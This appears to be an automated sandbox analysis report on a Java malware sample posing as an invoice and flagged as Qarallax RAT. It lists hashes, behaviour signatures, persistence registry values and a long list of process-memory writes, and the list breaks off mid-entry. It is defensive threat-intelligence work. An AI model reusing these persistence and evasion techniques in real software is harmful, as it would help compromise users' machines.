Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows7_x64 -
resource
win7 -
submitted
19-08-2020 10:25
Static task
static1
Behavioral task
behavioral1
Sample
Invoice 645505.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Invoice 645505.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
Invoice 645505.jar
-
Size
411KB
-
MD5
c155328fa4fc5bcef15471d7b260ced4
-
SHA1
3ed307dfdd397b93f6a6bb2fa69a8f10904d59cb
-
SHA256
409a926c8b06ca68686a8061be80b306eb5c7b1b29aa4e7323540f555254caa8
-
SHA512
e9edce2b9e24578164876323f8678fbd62d5426fac48654a597b9776b97ab3a07232cfbfe3e25d988d9ec46fa7e38e425a3806d711174b5294c6124d5cdc88f7
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001352a-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1088 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\UeGUQDf = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\plstY\\oxPAo.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\UeGUQDf = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\plstY\\oxPAo.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\plstY\Desktop.ini java.exe File created C:\Users\Admin\plstY\Desktop.ini java.exe File opened for modification C:\Users\Admin\plstY\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\plstY\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\zPcmE java.exe File opened for modification C:\Windows\System32\zPcmE java.exe -
Kills process with taskkill 19 IoCs
pid Process 2328 taskkill.exe 672 taskkill.exe 1580 taskkill.exe 2176 taskkill.exe 2280 taskkill.exe 1876 taskkill.exe 1060 taskkill.exe 1500 taskkill.exe 1532 taskkill.exe 2224 taskkill.exe 2424 taskkill.exe 1380 taskkill.exe 464 taskkill.exe 464 taskkill.exe 1580 taskkill.exe 1756 taskkill.exe 1568 taskkill.exe 2376 taskkill.exe 2472 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1540 powershell.exe 1540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 100 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 744 WMIC.exe Token: SeSecurityPrivilege 744 WMIC.exe Token: SeTakeOwnershipPrivilege 744 WMIC.exe Token: SeLoadDriverPrivilege 744 WMIC.exe Token: SeSystemProfilePrivilege 744 WMIC.exe Token: SeSystemtimePrivilege 744 WMIC.exe Token: SeProfSingleProcessPrivilege 744 WMIC.exe Token: SeIncBasePriorityPrivilege 744 WMIC.exe Token: SeCreatePagefilePrivilege 744 WMIC.exe Token: SeBackupPrivilege 744 WMIC.exe Token: SeRestorePrivilege 744 WMIC.exe Token: SeShutdownPrivilege 744 WMIC.exe Token: SeDebugPrivilege 744 WMIC.exe Token: SeSystemEnvironmentPrivilege 744 WMIC.exe Token: SeRemoteShutdownPrivilege 744 WMIC.exe Token: SeUndockPrivilege 744 WMIC.exe Token: SeManageVolumePrivilege 744 WMIC.exe Token: 33 744 WMIC.exe Token: 34 744 WMIC.exe Token: 35 744 WMIC.exe Token: SeIncreaseQuotaPrivilege 744 WMIC.exe Token: SeSecurityPrivilege 744 WMIC.exe Token: SeTakeOwnershipPrivilege 744 WMIC.exe Token: SeLoadDriverPrivilege 744 WMIC.exe Token: SeSystemProfilePrivilege 744 WMIC.exe Token: SeSystemtimePrivilege 744 WMIC.exe Token: SeProfSingleProcessPrivilege 744 WMIC.exe Token: SeIncBasePriorityPrivilege 744 WMIC.exe Token: SeCreatePagefilePrivilege 744 WMIC.exe Token: SeBackupPrivilege 744 WMIC.exe Token: SeRestorePrivilege 744 WMIC.exe Token: SeShutdownPrivilege 744 WMIC.exe Token: SeDebugPrivilege 744 WMIC.exe Token: SeSystemEnvironmentPrivilege 744 WMIC.exe Token: SeRemoteShutdownPrivilege 744 WMIC.exe Token: SeUndockPrivilege 744 WMIC.exe Token: SeManageVolumePrivilege 744 WMIC.exe Token: 33 744 WMIC.exe Token: 34 744 WMIC.exe Token: 35 744 WMIC.exe Token: SeIncreaseQuotaPrivilege 284 WMIC.exe Token: SeSecurityPrivilege 284 WMIC.exe Token: SeTakeOwnershipPrivilege 284 WMIC.exe Token: SeLoadDriverPrivilege 284 WMIC.exe Token: SeSystemProfilePrivilege 284 WMIC.exe Token: SeSystemtimePrivilege 284 WMIC.exe Token: SeProfSingleProcessPrivilege 284 WMIC.exe Token: SeIncBasePriorityPrivilege 284 WMIC.exe Token: SeCreatePagefilePrivilege 284 WMIC.exe Token: SeBackupPrivilege 284 WMIC.exe Token: SeRestorePrivilege 284 WMIC.exe Token: SeShutdownPrivilege 284 WMIC.exe Token: SeDebugPrivilege 284 WMIC.exe Token: SeSystemEnvironmentPrivilege 284 WMIC.exe Token: SeRemoteShutdownPrivilege 284 WMIC.exe Token: SeUndockPrivilege 284 WMIC.exe Token: SeManageVolumePrivilege 284 WMIC.exe Token: 33 284 WMIC.exe Token: 34 284 WMIC.exe Token: 35 284 WMIC.exe Token: SeIncreaseQuotaPrivilege 284 WMIC.exe Token: SeSecurityPrivilege 284 WMIC.exe Token: SeTakeOwnershipPrivilege 284 WMIC.exe Token: SeLoadDriverPrivilege 284 WMIC.exe Token: SeSystemProfilePrivilege 284 WMIC.exe Token: SeSystemtimePrivilege 284 WMIC.exe Token: SeProfSingleProcessPrivilege 284 WMIC.exe Token: SeIncBasePriorityPrivilege 284 WMIC.exe Token: SeCreatePagefilePrivilege 284 WMIC.exe Token: SeBackupPrivilege 284 WMIC.exe Token: SeRestorePrivilege 284 WMIC.exe Token: SeShutdownPrivilege 284 WMIC.exe Token: SeDebugPrivilege 284 WMIC.exe Token: SeSystemEnvironmentPrivilege 284 WMIC.exe Token: SeRemoteShutdownPrivilege 284 WMIC.exe Token: SeUndockPrivilege 284 WMIC.exe Token: SeManageVolumePrivilege 284 WMIC.exe Token: 33 284 WMIC.exe Token: 34 284 WMIC.exe Token: 35 284 WMIC.exe Token: SeDebugPrivilege 1876 taskkill.exe Token: SeDebugPrivilege 1380 taskkill.exe Token: SeDebugPrivilege 1756 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 464 taskkill.exe Token: SeDebugPrivilege 672 taskkill.exe Token: SeDebugPrivilege 464 taskkill.exe Token: SeDebugPrivilege 1580 taskkill.exe Token: SeDebugPrivilege 1580 taskkill.exe Token: SeDebugPrivilege 1060 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 1500 taskkill.exe Token: SeDebugPrivilege 2176 taskkill.exe Token: SeDebugPrivilege 2224 taskkill.exe Token: SeDebugPrivilege 2280 taskkill.exe Token: SeDebugPrivilege 2328 taskkill.exe Token: SeDebugPrivilege 2376 taskkill.exe Token: SeDebugPrivilege 2424 taskkill.exe Token: SeDebugPrivilege 2472 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1088 java.exe -
Suspicious use of WriteProcessMemory 798 IoCs
description pid Process procid_target PID 1088 wrote to memory of 304 1088 java.exe 25 PID 1088 wrote to memory of 304 1088 java.exe 25 PID 1088 wrote to memory of 304 1088 java.exe 25 PID 1088 wrote to memory of 792 1088 java.exe 26 PID 1088 wrote to memory of 792 1088 java.exe 26 PID 1088 wrote to memory of 792 1088 java.exe 26 PID 792 wrote to memory of 744 792 cmd.exe 27 PID 792 wrote to memory of 744 792 cmd.exe 27 PID 792 wrote to memory of 744 792 cmd.exe 27 PID 1088 wrote to memory of 1040 1088 java.exe 28 PID 1088 wrote to memory of 1040 1088 java.exe 28 PID 1088 wrote to memory of 1040 1088 java.exe 28 PID 1040 wrote to memory of 284 1040 cmd.exe 29 PID 1040 wrote to memory of 284 1040 cmd.exe 29 PID 1040 wrote to memory of 284 1040 cmd.exe 29 PID 1088 wrote to memory of 1780 1088 java.exe 30 PID 1088 wrote to memory of 1780 1088 java.exe 30 PID 1088 wrote to memory of 1780 1088 java.exe 30 PID 1088 wrote to memory of 1788 1088 java.exe 31 PID 1088 wrote to memory of 1788 1088 java.exe 31 PID 1088 wrote to memory of 1788 1088 java.exe 31 PID 1088 wrote to memory of 1832 1088 java.exe 32 PID 1088 wrote to memory of 1832 1088 java.exe 32 PID 1088 wrote to memory of 1832 1088 java.exe 32 PID 1088 wrote to memory of 1828 1088 java.exe 33 PID 1088 wrote to memory of 1828 1088 java.exe 33 PID 1088 wrote to memory of 1828 1088 java.exe 33 PID 1088 wrote to memory of 1180 1088 java.exe 34 PID 1088 wrote to memory of 1180 1088 java.exe 34 PID 1088 wrote to memory of 1180 1088 java.exe 34 PID 1088 wrote to memory of 1840 1088 java.exe 35 PID 1088 wrote to memory of 1840 1088 java.exe 35 PID 1088 wrote to memory of 1840 1088 java.exe 35 PID 1088 wrote to memory of 1776 1088 java.exe 36 PID 1088 wrote to memory of 1776 1088 java.exe 36 PID 1088 wrote to memory of 1776 1088 java.exe 36 PID 1088 wrote to memory of 1752 1088 java.exe 37 PID 1088 wrote to memory of 1752 1088 java.exe 37 PID 1088 wrote to memory of 1752 1088 java.exe 37 PID 1088 wrote to memory of 1628 1088 java.exe 38 PID 1088 wrote to memory of 1628 1088 java.exe 38 PID 1088 wrote to memory of 1628 1088 java.exe 38 PID 1088 wrote to memory of 1560 1088 java.exe 39 PID 1088 wrote to memory of 1560 1088 java.exe 39 PID 1088 wrote to memory of 1560 1088 java.exe 39 PID 1088 wrote to memory of 1540 1088 java.exe 40 PID 1088 wrote to memory of 1540 1088 java.exe 40 PID 1088 wrote to memory of 1540 1088 java.exe 40 PID 1088 wrote to memory of 1604 1088 java.exe 41 PID 1088 wrote to memory of 1604 1088 java.exe 41 PID 1088 wrote to memory of 1604 1088 java.exe 41 PID 1088 wrote to memory of 1876 1088 java.exe 42 PID 1088 wrote to memory of 1876 1088 java.exe 42 PID 1088 wrote to memory of 1876 1088 java.exe 42 PID 1628 wrote to memory of 1868 1628 cmd.exe 44 PID 1628 wrote to memory of 1868 1628 cmd.exe 44 PID 1628 wrote to memory of 1868 1628 cmd.exe 44 PID 1088 wrote to memory of 1960 1088 java.exe 46 PID 1088 wrote to memory of 1960 1088 java.exe 46 PID 1088 wrote to memory of 1960 1088 java.exe 46 PID 1088 wrote to memory of 1940 1088 java.exe 49 PID 1088 wrote to memory of 1940 1088 java.exe 49 PID 1088 wrote to memory of 1940 1088 java.exe 49 PID 1088 wrote to memory of 2032 1088 java.exe 51 PID 1088 wrote to memory of 2032 1088 java.exe 51 PID 1088 wrote to memory of 2032 1088 java.exe 51 PID 1088 wrote to memory of 1992 1088 java.exe 52 PID 1088 wrote to memory of 1992 1088 java.exe 52 PID 1088 wrote to memory of 1992 1088 java.exe 52 PID 1628 wrote to memory of 1476 1628 cmd.exe 54 PID 1628 wrote to memory of 1476 1628 cmd.exe 54 PID 1628 wrote to memory of 1476 1628 cmd.exe 54 PID 1088 wrote to memory of 1548 1088 java.exe 55 PID 1088 wrote to memory of 1548 1088 java.exe 55 PID 1088 wrote to memory of 1548 1088 java.exe 55 PID 1088 wrote to memory of 1012 1088 java.exe 56 PID 1088 wrote to memory of 1012 1088 java.exe 56 PID 1088 wrote to memory of 1012 1088 java.exe 56 PID 1088 wrote to memory of 1504 1088 java.exe 60 PID 1088 wrote to memory of 1504 1088 java.exe 60 PID 1088 wrote to memory of 1504 1088 java.exe 60 PID 1088 wrote to memory of 1632 1088 java.exe 61 PID 1088 wrote to memory of 1632 1088 java.exe 61 PID 1088 wrote to memory of 1632 1088 java.exe 61 PID 1088 wrote to memory of 744 1088 java.exe 62 PID 1088 wrote to memory of 744 1088 java.exe 62 PID 1088 wrote to memory of 744 1088 java.exe 62 PID 1088 wrote to memory of 1332 1088 java.exe 66 PID 1088 wrote to memory of 1332 1088 java.exe 66 PID 1088 wrote to memory of 1332 1088 java.exe 66 PID 1088 wrote to memory of 1796 1088 java.exe 67 PID 1088 wrote to memory of 1796 1088 java.exe 67 PID 1088 wrote to memory of 1796 1088 java.exe 67 PID 1088 wrote to memory of 1824 1088 java.exe 70 PID 1088 wrote to memory of 1824 1088 java.exe 70 PID 1088 wrote to memory of 1824 1088 java.exe 70 PID 1088 wrote to memory of 1852 1088 java.exe 72 PID 1088 wrote to memory of 1852 1088 java.exe 72 PID 1088 wrote to memory of 1852 1088 java.exe 72 PID 1088 wrote to memory of 1904 1088 java.exe 74 PID 1088 wrote to memory of 1904 1088 java.exe 74 PID 1088 wrote to memory of 1904 1088 java.exe 74 PID 1088 wrote to memory of 1920 1088 java.exe 75 PID 1088 wrote to memory of 1920 1088 java.exe 75 PID 1088 wrote to memory of 1920 1088 java.exe 75 PID 1088 wrote to memory of 2040 1088 java.exe 77 PID 1088 wrote to memory of 2040 1088 java.exe 77 PID 1088 wrote to memory of 2040 1088 java.exe 77 PID 1088 wrote to memory of 2016 1088 java.exe 78 PID 1088 wrote to memory of 2016 1088 java.exe 78 PID 1088 wrote to memory of 2016 1088 java.exe 78 PID 1088 wrote to memory of 324 1088 java.exe 82 PID 1088 wrote to memory of 324 1088 java.exe 82 PID 1088 wrote to memory of 324 1088 java.exe 82 PID 1088 wrote to memory of 1380 1088 java.exe 83 PID 1088 wrote to memory of 1380 1088 java.exe 83 PID 1088 wrote to memory of 1380 1088 java.exe 83 PID 1904 wrote to memory of 1784 1904 cmd.exe 84 PID 1904 wrote to memory of 1784 1904 cmd.exe 84 PID 1904 wrote to memory of 1784 1904 cmd.exe 84 PID 1088 wrote to memory of 1900 1088 java.exe 87 PID 1088 wrote to memory of 1900 1088 java.exe 87 PID 1088 wrote to memory of 1900 1088 java.exe 87 PID 1088 wrote to memory of 1912 1088 java.exe 88 PID 1088 wrote to memory of 1912 1088 java.exe 88 PID 1088 wrote to memory of 1912 1088 java.exe 88 PID 1088 wrote to memory of 1620 1088 java.exe 90 PID 1088 wrote to memory of 1620 1088 java.exe 90 PID 1088 wrote to memory of 1620 1088 java.exe 90 PID 1088 wrote to memory of 1788 1088 java.exe 91 PID 1088 wrote to memory of 1788 1088 java.exe 91 PID 1088 wrote to memory of 1788 1088 java.exe 91 PID 1904 wrote to memory of 1932 1904 cmd.exe 93 PID 1904 wrote to memory of 1932 1904 cmd.exe 93 PID 1904 wrote to memory of 1932 1904 cmd.exe 93 PID 1088 wrote to memory of 1040 1088 java.exe 95 PID 1088 wrote to memory of 1040 1088 java.exe 95 PID 1088 wrote to memory of 1040 1088 java.exe 95 PID 1088 wrote to memory of 1060 1088 java.exe 97 PID 1088 wrote to memory of 1060 1088 java.exe 97 PID 1088 wrote to memory of 1060 1088 java.exe 97 PID 1088 wrote to memory of 464 1088 java.exe 98 PID 1088 wrote to memory of 464 1088 java.exe 98 PID 1088 wrote to memory of 464 1088 java.exe 98 PID 1088 wrote to memory of 1992 1088 java.exe 100 PID 1088 wrote to memory of 1992 1088 java.exe 100 PID 1088 wrote to memory of 1992 1088 java.exe 100 PID 1040 wrote to memory of 1484 1040 cmd.exe 102 PID 1040 wrote to memory of 1484 1040 cmd.exe 102 PID 1040 wrote to memory of 1484 1040 cmd.exe 102 PID 1088 wrote to memory of 1624 1088 java.exe 103 PID 1088 wrote to memory of 1624 1088 java.exe 103 PID 1088 wrote to memory of 1624 1088 java.exe 103 PID 1088 wrote to memory of 1516 1088 java.exe 106 PID 1088 wrote to memory of 1516 1088 java.exe 106 PID 1088 wrote to memory of 1516 1088 java.exe 106 PID 1088 wrote to memory of 744 1088 java.exe 107 PID 1088 wrote to memory of 744 1088 java.exe 107 PID 1088 wrote to memory of 744 1088 java.exe 107 PID 1088 wrote to memory of 1756 1088 java.exe 109 PID 1088 wrote to memory of 1756 1088 java.exe 109 PID 1088 wrote to memory of 1756 1088 java.exe 109 PID 1040 wrote to memory of 1560 1040 cmd.exe 110 PID 1040 wrote to memory of 1560 1040 cmd.exe 110 PID 1040 wrote to memory of 1560 1040 cmd.exe 110 PID 1088 wrote to memory of 1496 1088 java.exe 111 PID 1088 wrote to memory of 1496 1088 java.exe 111 PID 1088 wrote to memory of 1496 1088 java.exe 111 PID 1088 wrote to memory of 1180 1088 java.exe 115 PID 1088 wrote to memory of 1180 1088 java.exe 115 PID 1088 wrote to memory of 1180 1088 java.exe 115 PID 1088 wrote to memory of 1476 1088 java.exe 116 PID 1088 wrote to memory of 1476 1088 java.exe 116 PID 1088 wrote to memory of 1476 1088 java.exe 116 PID 1088 wrote to memory of 1920 1088 java.exe 118 PID 1088 wrote to memory of 1920 1088 java.exe 118 PID 1088 wrote to memory of 1920 1088 java.exe 118 PID 1476 wrote to memory of 1104 1476 cmd.exe 119 PID 1476 wrote to memory of 1104 1476 cmd.exe 119 PID 1476 wrote to memory of 1104 1476 cmd.exe 119 PID 1476 wrote to memory of 2040 1476 cmd.exe 120 PID 1476 wrote to memory of 2040 1476 cmd.exe 120 PID 1476 wrote to memory of 2040 1476 cmd.exe 120 PID 1088 wrote to memory of 1900 1088 java.exe 123 PID 1088 wrote to memory of 1900 1088 java.exe 123 PID 1088 wrote to memory of 1900 1088 java.exe 123 PID 1900 wrote to memory of 652 1900 cmd.exe 124 PID 1900 wrote to memory of 652 1900 cmd.exe 124 PID 1900 wrote to memory of 652 1900 cmd.exe 124 PID 1900 wrote to memory of 572 1900 cmd.exe 125 PID 1900 wrote to memory of 572 1900 cmd.exe 125 PID 1900 wrote to memory of 572 1900 cmd.exe 125 PID 1088 wrote to memory of 1776 1088 java.exe 126 PID 1088 wrote to memory of 1776 1088 java.exe 126 PID 1088 wrote to memory of 1776 1088 java.exe 126 PID 1776 wrote to memory of 1948 1776 cmd.exe 127 PID 1776 wrote to memory of 1948 1776 cmd.exe 127 PID 1776 wrote to memory of 1948 1776 cmd.exe 127 PID 1776 wrote to memory of 1608 1776 cmd.exe 128 PID 1776 wrote to memory of 1608 1776 cmd.exe 128 PID 1776 wrote to memory of 1608 1776 cmd.exe 128 PID 1088 wrote to memory of 1824 1088 java.exe 129 PID 1088 wrote to memory of 1824 1088 java.exe 129 PID 1088 wrote to memory of 1824 1088 java.exe 129 PID 1824 wrote to memory of 296 1824 cmd.exe 130 PID 1824 wrote to memory of 296 1824 cmd.exe 130 PID 1824 wrote to memory of 296 1824 cmd.exe 130 PID 1824 wrote to memory of 1076 1824 cmd.exe 131 PID 1824 wrote to memory of 1076 1824 cmd.exe 131 PID 1824 wrote to memory of 1076 1824 cmd.exe 131 PID 1088 wrote to memory of 1752 1088 java.exe 132 PID 1088 wrote to memory of 1752 1088 java.exe 132 PID 1088 wrote to memory of 1752 1088 java.exe 132 PID 1752 wrote to memory of 1940 1752 cmd.exe 133 PID 1752 wrote to memory of 1940 1752 cmd.exe 133 PID 1752 wrote to memory of 1940 1752 cmd.exe 133 PID 1088 wrote to memory of 1568 1088 java.exe 134 PID 1088 wrote to memory of 1568 1088 java.exe 134 PID 1088 wrote to memory of 1568 1088 java.exe 134 PID 1752 wrote to memory of 1976 1752 cmd.exe 136 PID 1752 wrote to memory of 1976 1752 cmd.exe 136 PID 1752 wrote to memory of 1976 1752 cmd.exe 136 PID 1088 wrote to memory of 1576 1088 java.exe 137 PID 1088 wrote to memory of 1576 1088 java.exe 137 PID 1088 wrote to memory of 1576 1088 java.exe 137 PID 1576 wrote to memory of 1772 1576 cmd.exe 138 PID 1576 wrote to memory of 1772 1576 cmd.exe 138 PID 1576 wrote to memory of 1772 1576 cmd.exe 138 PID 1576 wrote to memory of 1484 1576 cmd.exe 139 PID 1576 wrote to memory of 1484 1576 cmd.exe 139 PID 1576 wrote to memory of 1484 1576 cmd.exe 139 PID 1088 wrote to memory of 1560 1088 java.exe 140 PID 1088 wrote to memory of 1560 1088 java.exe 140 PID 1088 wrote to memory of 1560 1088 java.exe 140 PID 1560 wrote to memory of 1796 1560 cmd.exe 141 PID 1560 wrote to memory of 1796 1560 cmd.exe 141 PID 1560 wrote to memory of 1796 1560 cmd.exe 141 PID 1560 wrote to memory of 1856 1560 cmd.exe 142 PID 1560 wrote to memory of 1856 1560 cmd.exe 142 PID 1560 wrote to memory of 1856 1560 cmd.exe 142 PID 1088 wrote to memory of 1496 1088 java.exe 143 PID 1088 wrote to memory of 1496 1088 java.exe 143 PID 1088 wrote to memory of 1496 1088 java.exe 143 PID 1496 wrote to memory of 1176 1496 cmd.exe 144 PID 1496 wrote to memory of 1176 1496 cmd.exe 144 PID 1496 wrote to memory of 1176 1496 cmd.exe 144 PID 1496 wrote to memory of 1180 1496 cmd.exe 145 PID 1496 wrote to memory of 1180 1496 cmd.exe 145 PID 1496 wrote to memory of 1180 1496 cmd.exe 145 PID 1088 wrote to memory of 1548 1088 java.exe 146 PID 1088 wrote to memory of 1548 1088 java.exe 146 PID 1088 wrote to memory of 1548 1088 java.exe 146 PID 1548 wrote to memory of 1920 1548 cmd.exe 147 PID 1548 wrote to memory of 1920 1548 cmd.exe 147 PID 1548 wrote to memory of 1920 1548 cmd.exe 147 PID 1548 wrote to memory of 1780 1548 cmd.exe 148 PID 1548 wrote to memory of 1780 1548 cmd.exe 148 PID 1548 wrote to memory of 1780 1548 cmd.exe 148 PID 1088 wrote to memory of 652 1088 java.exe 149 PID 1088 wrote to memory of 652 1088 java.exe 149 PID 1088 wrote to memory of 652 1088 java.exe 149 PID 652 wrote to memory of 1340 652 cmd.exe 150 PID 652 wrote to memory of 1340 652 cmd.exe 150 PID 652 wrote to memory of 1340 652 cmd.exe 150 PID 652 wrote to memory of 1912 652 cmd.exe 151 PID 652 wrote to memory of 1912 652 cmd.exe 151 PID 652 wrote to memory of 1912 652 cmd.exe 151 PID 1088 wrote to memory of 296 1088 java.exe 152 PID 1088 wrote to memory of 296 1088 java.exe 152 PID 1088 wrote to memory of 296 1088 java.exe 152 PID 1088 wrote to memory of 464 1088 java.exe 153 PID 1088 wrote to memory of 464 1088 java.exe 153 PID 1088 wrote to memory of 464 1088 java.exe 153 PID 296 wrote to memory of 1924 296 cmd.exe 155 PID 296 wrote to memory of 1924 296 cmd.exe 155 PID 296 wrote to memory of 1924 296 cmd.exe 155 PID 296 wrote to memory of 1692 296 cmd.exe 156 PID 296 wrote to memory of 1692 296 cmd.exe 156 PID 296 wrote to memory of 1692 296 cmd.exe 156 PID 1088 wrote to memory of 1684 1088 java.exe 157 PID 1088 wrote to memory of 1684 1088 java.exe 157 PID 1088 wrote to memory of 1684 1088 java.exe 157 PID 1684 wrote to memory of 1332 1684 cmd.exe 158 PID 1684 wrote to memory of 1332 1684 cmd.exe 158 PID 1684 wrote to memory of 1332 1684 cmd.exe 158 PID 1684 wrote to memory of 2016 1684 cmd.exe 159 PID 1684 wrote to memory of 2016 1684 cmd.exe 159 PID 1684 wrote to memory of 2016 1684 cmd.exe 159 PID 1088 wrote to memory of 2044 1088 java.exe 160 PID 1088 wrote to memory of 2044 1088 java.exe 160 PID 1088 wrote to memory of 2044 1088 java.exe 160 PID 2044 wrote to memory of 1756 2044 cmd.exe 161 PID 2044 wrote to memory of 1756 2044 cmd.exe 161 PID 2044 wrote to memory of 1756 2044 cmd.exe 161 PID 2044 wrote to memory of 456 2044 cmd.exe 162 PID 2044 wrote to memory of 456 2044 cmd.exe 162 PID 2044 wrote to memory of 456 2044 cmd.exe 162 PID 1088 wrote to memory of 1380 1088 java.exe 163 PID 1088 wrote to memory of 1380 1088 java.exe 163 PID 1088 wrote to memory of 1380 1088 java.exe 163 PID 1380 wrote to memory of 1012 1380 cmd.exe 164 PID 1380 wrote to memory of 1012 1380 cmd.exe 164 PID 1380 wrote to memory of 1012 1380 cmd.exe 164 PID 1380 wrote to memory of 1860 1380 cmd.exe 165 PID 1380 wrote to memory of 1860 1380 cmd.exe 165 PID 1380 wrote to memory of 1860 1380 cmd.exe 165 PID 1088 wrote to memory of 1864 1088 java.exe 166 PID 1088 wrote to memory of 1864 1088 java.exe 166 PID 1088 wrote to memory of 1864 1088 java.exe 166 PID 1864 wrote to memory of 1944 1864 cmd.exe 167 PID 1864 wrote to memory of 1944 1864 cmd.exe 167 PID 1864 wrote to memory of 1944 1864 cmd.exe 167 PID 1864 wrote to memory of 1856 1864 cmd.exe 168 PID 1864 wrote to memory of 1856 1864 cmd.exe 168 PID 1864 wrote to memory of 1856 1864 cmd.exe 168 PID 1088 wrote to memory of 672 1088 java.exe 169 PID 1088 wrote to memory of 672 1088 java.exe 169 PID 1088 wrote to memory of 672 1088 java.exe 169 PID 1088 wrote to memory of 1624 1088 java.exe 171 PID 1088 wrote to memory of 1624 1088 java.exe 171 PID 1088 wrote to memory of 1624 1088 java.exe 171 PID 1624 wrote to memory of 1928 1624 cmd.exe 172 PID 1624 wrote to memory of 1928 1624 cmd.exe 172 PID 1624 wrote to memory of 1928 1624 cmd.exe 172 PID 1624 wrote to memory of 1552 1624 cmd.exe 173 PID 1624 wrote to memory of 1552 1624 cmd.exe 173 PID 1624 wrote to memory of 1552 1624 cmd.exe 173 PID 1088 wrote to memory of 1780 1088 java.exe 174 PID 1088 wrote to memory of 1780 1088 java.exe 174 PID 1088 wrote to memory of 1780 1088 java.exe 174 PID 1780 wrote to memory of 1036 1780 cmd.exe 175 PID 1780 wrote to memory of 1036 1780 cmd.exe 175 PID 1780 wrote to memory of 1036 1780 cmd.exe 175 PID 1780 wrote to memory of 1340 1780 cmd.exe 176 PID 1780 wrote to memory of 1340 1780 cmd.exe 176 PID 1780 wrote to memory of 1340 1780 cmd.exe 176 PID 1088 wrote to memory of 1912 1088 java.exe 177 PID 1088 wrote to memory of 1912 1088 java.exe 177 PID 1088 wrote to memory of 1912 1088 java.exe 177 PID 1912 wrote to memory of 1940 1912 cmd.exe 178 PID 1912 wrote to memory of 1940 1912 cmd.exe 178 PID 1912 wrote to memory of 1940 1912 cmd.exe 178 PID 1912 wrote to memory of 2004 1912 cmd.exe 179 PID 1912 wrote to memory of 2004 1912 cmd.exe 179 PID 1912 wrote to memory of 2004 1912 cmd.exe 179 PID 1088 wrote to memory of 1916 1088 java.exe 180 PID 1088 wrote to memory of 1916 1088 java.exe 180 PID 1088 wrote to memory of 1916 1088 java.exe 180 PID 1916 wrote to memory of 1772 1916 cmd.exe 181 PID 1916 wrote to memory of 1772 1916 cmd.exe 181 PID 1916 wrote to memory of 1772 1916 cmd.exe 181 PID 1916 wrote to memory of 1932 1916 cmd.exe 182 PID 1916 wrote to memory of 1932 1916 cmd.exe 182 PID 1916 wrote to memory of 1932 1916 cmd.exe 182 PID 1088 wrote to memory of 1388 1088 java.exe 183 PID 1088 wrote to memory of 1388 1088 java.exe 183 PID 1088 wrote to memory of 1388 1088 java.exe 183 PID 1088 wrote to memory of 464 1088 java.exe 184 PID 1088 wrote to memory of 464 1088 java.exe 184 PID 1088 wrote to memory of 464 1088 java.exe 184 PID 1388 wrote to memory of 1332 1388 cmd.exe 185 PID 1388 wrote to memory of 1332 1388 cmd.exe 185 PID 1388 wrote to memory of 1332 1388 cmd.exe 185 PID 1388 wrote to memory of 1632 1388 cmd.exe 186 PID 1388 wrote to memory of 1632 1388 cmd.exe 186 PID 1388 wrote to memory of 1632 1388 cmd.exe 186 PID 1088 wrote to memory of 540 1088 java.exe 188 PID 1088 wrote to memory of 540 1088 java.exe 188 PID 1088 wrote to memory of 540 1088 java.exe 188 PID 540 wrote to memory of 1396 540 cmd.exe 189 PID 540 wrote to memory of 1396 540 cmd.exe 189 PID 540 wrote to memory of 1396 540 cmd.exe 189 PID 540 wrote to memory of 1456 540 cmd.exe 190 PID 540 wrote to memory of 1456 540 cmd.exe 190 PID 540 wrote to memory of 1456 540 cmd.exe 190 PID 1088 wrote to memory of 1816 1088 java.exe 191 PID 1088 wrote to memory of 1816 1088 java.exe 191 PID 1088 wrote to memory of 1816 1088 java.exe 191 PID 1816 wrote to memory of 1868 1816 cmd.exe 192 PID 1816 wrote to memory of 1868 1816 cmd.exe 192 PID 1816 wrote to memory of 1868 1816 cmd.exe 192 PID 1816 wrote to memory of 1936 1816 cmd.exe 193 PID 1816 wrote to memory of 1936 1816 cmd.exe 193 PID 1816 wrote to memory of 1936 1816 cmd.exe 193 PID 1088 wrote to memory of 1552 1088 java.exe 194 PID 1088 wrote to memory of 1552 1088 java.exe 194 PID 1088 wrote to memory of 1552 1088 java.exe 194 PID 1552 wrote to memory of 1620 1552 cmd.exe 195 PID 1552 wrote to memory of 1620 1552 cmd.exe 195 PID 1552 wrote to memory of 1620 1552 cmd.exe 195 PID 1552 wrote to memory of 1608 1552 cmd.exe 196 PID 1552 wrote to memory of 1608 1552 cmd.exe 196 PID 1552 wrote to memory of 1608 1552 cmd.exe 196 PID 1088 wrote to memory of 1344 1088 java.exe 197 PID 1088 wrote to memory of 1344 1088 java.exe 197 PID 1088 wrote to memory of 1344 1088 java.exe 197 PID 1344 wrote to memory of 1692 1344 